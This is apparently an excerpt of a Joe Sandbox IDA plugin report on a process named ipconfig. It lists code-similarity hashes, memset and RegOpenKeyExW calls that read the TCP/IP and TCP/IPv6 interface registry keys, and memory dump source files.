• Snapshot File: hcaresult_9_2_3830000_ipconfig.jbxd
Similarity
• API ID: CallFilterFunc@8
• String ID: @$@4Qw@4Qw
• API String ID: 4062629308-2383119779
• Opcode ID: 3e7dcca7e0d73719e097cebb63bd68908c99d6731e8f5a152a5a39749bde5dd0
• Instruction ID: 3d5467b0845edf5c97790dd5b96120eccae54d4970b1fae6e7a563919e37d167
• Opcode Fuzzy Hash: 3e7dcca7e0d73719e097cebb63bd68908c99d6731e8f5a152a5a39749bde5dd0
• Instruction Fuzzy Hash: 10417B759003189FCB21DFE9C840AADBBB8FF45B00F0845AAE914DF254D770D949CB62
APIs
• memset.MSVCRT ref: 00F6228A
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00F62207,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\,00000200), ref: 00F622DF
Strings
• SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\, xrefs: 00F62291
Memory Dump Source
• Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
Similarity
• API ID: Openmemset
• String ID: SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
• API String ID: 180050240-3129059797
• Opcode ID: 3321ce8d42e0820fecd26db15109db42042c85364e0fd6e46309ea83e1c612ab
• Instruction ID: 9203bbd3f6fb156ad6831796ef772f166b99f29fbbe0c1f78760718ff837fbe8
• Opcode Fuzzy Hash: 3321ce8d42e0820fecd26db15109db42042c85364e0fd6e46309ea83e1c612ab
• Instruction Fuzzy Hash: 1F01F5B2600218ABE750EB14DC07FAA73ACEB10714F104069F915EA1C2DA74EA04A664
APIs
• memset.MSVCRT ref: 00F62C2B
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,?,00000000,?,00F62BA8,?,00000000,SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\,00000200), ref: 00F62C80
Strings
• SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\, xrefs: 00F62C32
Memory Dump Source
• Source File: 00000009.00000002.4000176880.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F60000, based on PE: true
• Associated: 00000009.00000002.4000176880.0000000000F67000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_f60000_ipconfig.jbxd
Similarity
• API ID: Openmemset
• String ID: SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters\Interfaces\
• API String ID: 180050240-944716191
• Opcode ID: da33aab5629986eb0101710a5be37da4a3ba488323279124161dc4f0c9e05f05
• Instruction ID: 91cfb15269ac5d138cfc2cdfac23a77c53286e9c56b80d3845f692eeb05655f6
• Opcode Fuzzy Hash: da33aab5629986eb0101710a5be37da4a3ba488323279124161dc4f0c9e05f05
• Instruction Fuzzy Hash: 4F0124B220031DBBE750EB24DD07FAE77ACEB11714F108065FA15EA1C2DA78EE049A60